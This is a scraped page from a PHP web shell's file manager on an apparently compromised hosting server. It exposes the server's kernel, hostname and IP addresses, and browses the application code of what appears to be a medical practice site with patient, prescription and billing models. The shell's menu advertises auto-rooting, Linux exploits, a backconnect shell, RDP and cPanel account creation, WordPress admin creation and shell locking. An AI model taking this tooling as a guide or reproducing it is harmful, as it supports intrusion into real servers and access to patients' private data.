Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
doctor.tradesense.co.ke /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
Console
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Providers
[ DIR ]
drwxr-xr-x
Appointment.php
258
B
-rw-r--r--
Billing.php
327
B
-rw-r--r--
Billing_item.php
138
B
-rw-r--r--
Document.php
199
B
-rw-r--r--
Drug.php
297
B
-rw-r--r--
History.php
131
B
-rw-r--r--
Patient.php
128
B
-rw-r--r--
Prescription.php
458
B
-rw-r--r--
Prescription_drug.php
253
B
-rw-r--r--
Prescription_test.php
256
B
-rw-r--r--
Setting.php
995
B
-rw-r--r--
Test.php
246
B
-rw-r--r--
User.php
958
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App; use Illuminate\Contracts\Auth\MustVerifyEmail; use Illuminate\Foundation\Auth\User as Authenticatable; use Illuminate\Notifications\Notifiable; class User extends Authenticatable { use Notifiable; /** * The attributes that are mass assignable. * * @var array */ protected $table = 'users'; protected $fillable = [ 'name', 'email', 'password', 'role', ]; /** * The attributes that should be hidden for arrays. * * @var array */ protected $hidden = [ 'password', 'remember_token', ]; /** * The attributes that should be cast to native types. * * @var array */ protected $casts = [ 'email_verified_at' => 'datetime', ]; public function Patient(){ return $this->hasOne('App\Patient'); } public function getNameAttribute($value) { return strtoupper($value); } }
Close